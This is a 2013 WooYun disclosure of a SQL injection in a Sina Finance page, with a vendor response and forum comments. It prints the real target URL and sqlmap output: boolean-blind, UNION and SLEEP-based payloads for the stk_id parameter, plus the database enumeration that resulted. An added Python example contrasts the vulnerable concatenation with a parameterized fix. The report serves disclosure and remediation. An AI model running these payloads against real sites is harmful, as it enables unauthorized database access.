
Vulnerability summary (24 followers)

Defect ID: wooyun-2013-039774

Title: An sqli injection vulnerability in Sina Finance

Vendor: Sina

Author: 霍大然

Submitted: 2013-10-15 11:02

Fixed: 2013-11-29 11:03

Published: 2013-11-29 11:03

Type: SQL injection

Severity: High

Self-assessed Rank: 11

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2013-10-15: Details sent to the vendor, awaiting vendor handling
2013-10-15: Vendor confirmed; details disclosed to the vendor only
2013-10-25: Details disclosed to core white hats and domain experts
2013-11-04: Details disclosed to regular white hats
2013-11-14: Details disclosed to intern white hats
2013-11-29: Details disclosed to the public

Brief description:

An sqli injection vulnerability in Sina Finance

Detailed description:

Injection point (sqlmap output follows):
http://biz.finance.sina.com.cn/stkrcmd/stkrcmd_people.php?stk_id=sh600981 (GET)
Place: GET
Parameter: stk_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: stk_id=sh600981' AND 5502=5502 AND 'oTFg'='oTFg
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: stk_id=sh600981' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716e747071,0x4f434a4f5248524f7a70,0x716a667471),NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: stk_id=sh600981' AND SLEEP(5) AND 'VpRa'='VpRa
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
available databases [3]:
[*] biz
[*] information_schema
[*] test
back-end DBMS: MySQL 5.0.11
Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| PROFILING |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
web application technology: Apache
back-end DBMS: MySQL 5.0.11
Database: information_schema
Table: USER_PRIVILEGES
[4 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| GRANTEE | varchar(81) |
| IS_GRANTABLE | varchar(3) |
| PRIVILEGE_TYPE | varchar(64) |
| TABLE_CATALOG | varchar(512) |
+----------------+--------------+
web application technology: Apache
back-end DBMS: MySQL 5.0.11
Database: information_schema
Table: TABLES
[21 columns]
+-----------------+--------------+
| Column | Type |
+-----------------+--------------+
| VERSION | bigint(21) |
| AUTO_INCREMENT | bigint(21) |
| AVG_ROW_LENGTH | bigint(21) |
| CHECK_TIME | datetime |
| CHECKSUM | bigint(21) |
| CREATE_OPTIONS | varchar(255) |
| CREATE_TIME | datetime |
| DATA_FREE | bigint(21) |
| DATA_LENGTH | bigint(21) |
| ENGINE | varchar(64) |
| INDEX_LENGTH | bigint(21) |
| MAX_DATA_LENGTH | bigint(21) |
| ROW_FORMAT | varchar(10) |
| TABLE_CATALOG | varchar(512) |
| TABLE_COLLATION | varchar(64) |
| TABLE_COMMENT | varchar(80) |
| TABLE_NAME | varchar(64) |
| TABLE_ROWS | bigint(21) |
| TABLE_SCHEMA | varchar(64) |
| TABLE_TYPE | varchar(64) |
| UPDATE_TIME | datetime |
+-----------------+--------------+

Proof of vulnerability:

8.PNG

Suggested fix:

Filter the parameter input
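To make the suggested fix concrete, here is an added Python example that is not part of the original report or of Sina's code: it builds a constructed in-memory SQLite table standing in for the stock lookup behind stkrcmd_people.php, shows the string-concatenation pattern under which the report's boolean-based payload changes the result set, and the hardened handler that whitelists the stk_id format and binds the value as a query parameter. The table name, column names, sample rows and handler function are assumptions.

```python
import re
import sqlite3

# Constructed sample table standing in for the stock lookup behind
# stkrcmd_people.php; the schema and rows are assumptions, not Sina's.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE stkrcmd (stk_id TEXT, analyst TEXT)")
    conn.executemany("INSERT INTO stkrcmd VALUES (?, ?)",
                     [("sh600981", "analyst-a"), ("sz000001", "analyst-b")])
    return conn

# Whitelist for the stk_id format seen in the report: an exchange prefix
# plus six digits. A quote character can never pass this check.
STK_ID_RE = re.compile(r"(sh|sz)\d{6}")

def validate_stk_id(stk_id):
    return STK_ID_RE.fullmatch(stk_id) is not None

def lookup_vulnerable(conn, stk_id):
    # Vulnerable pattern: the GET value is spliced into the SQL text, so a
    # quoted payload becomes part of the WHERE clause and can flip its truth.
    sql = "SELECT analyst FROM stkrcmd WHERE stk_id = '%s'" % stk_id
    return [row[0] for row in conn.execute(sql)]

def handle_request(conn, stk_id):
    # Hardened handler: reject malformed ids with a 400, then bind the value
    # as a query parameter so the driver treats it as data, never as SQL.
    if not validate_stk_id(stk_id):
        return 400, []
    rows = conn.execute(
        "SELECT analyst FROM stkrcmd WHERE stk_id = ?", (stk_id,))
    return 200, [row[0] for row in rows]

def lookup_bound_only(conn, stk_id):
    # Even without the whitelist, a bound parameter is compared as a literal,
    # so the payload string simply matches no row.
    rows = conn.execute(
        "SELECT analyst FROM stkrcmd WHERE stk_id = ?", (stk_id,))
    return [row[0] for row in rows]

if __name__ == "__main__":
    db = make_db()
    true_payload = "sh600981' AND 5502=5502 AND 'oTFg'='oTFg"   # from the report
    false_payload = "sh600981' AND 5502=5503 AND 'oTFg'='oTFg"  # constructed
    print(lookup_vulnerable(db, true_payload))   # ['analyst-a']
    print(lookup_vulnerable(db, false_payload))  # []
    print(handle_request(db, true_payload))      # (400, [])
    print(handle_request(db, "sh600981"))        # (200, ['analyst-a'])
```

The differing results of the two concatenated queries are exactly the signal a boolean-based blind check keys on; both hardened paths remove it.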

Copyright notice: please credit the source when reposting: 霍大然@乌云


Vulnerability response

Vendor response:

Severity: Medium

Rank: 8

Confirmed: 2013-10-15 11:24

Vendor reply:

Thanks for your attention to Sina security; we will arrange for the relevant staff to fix it right away.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2013-10-15 11:20 | MeirLin ( Intern white hat | Rank:96 Vulns:30 | account lent out)

    What is Sqli?

  2. 2013-10-15 11:23 | 霍大然 ( Regular white hat | Rank:1136 Vulns:178 | Out of W-coins; grind for points or not?)

    Good eye, I didn't even notice I had typed an extra i

  3. 2013-10-15 14:09 | Fireweed ( Regular white hat | Rank:107 Vulns:14 | Show me the #)

    Sqli is the next version of sql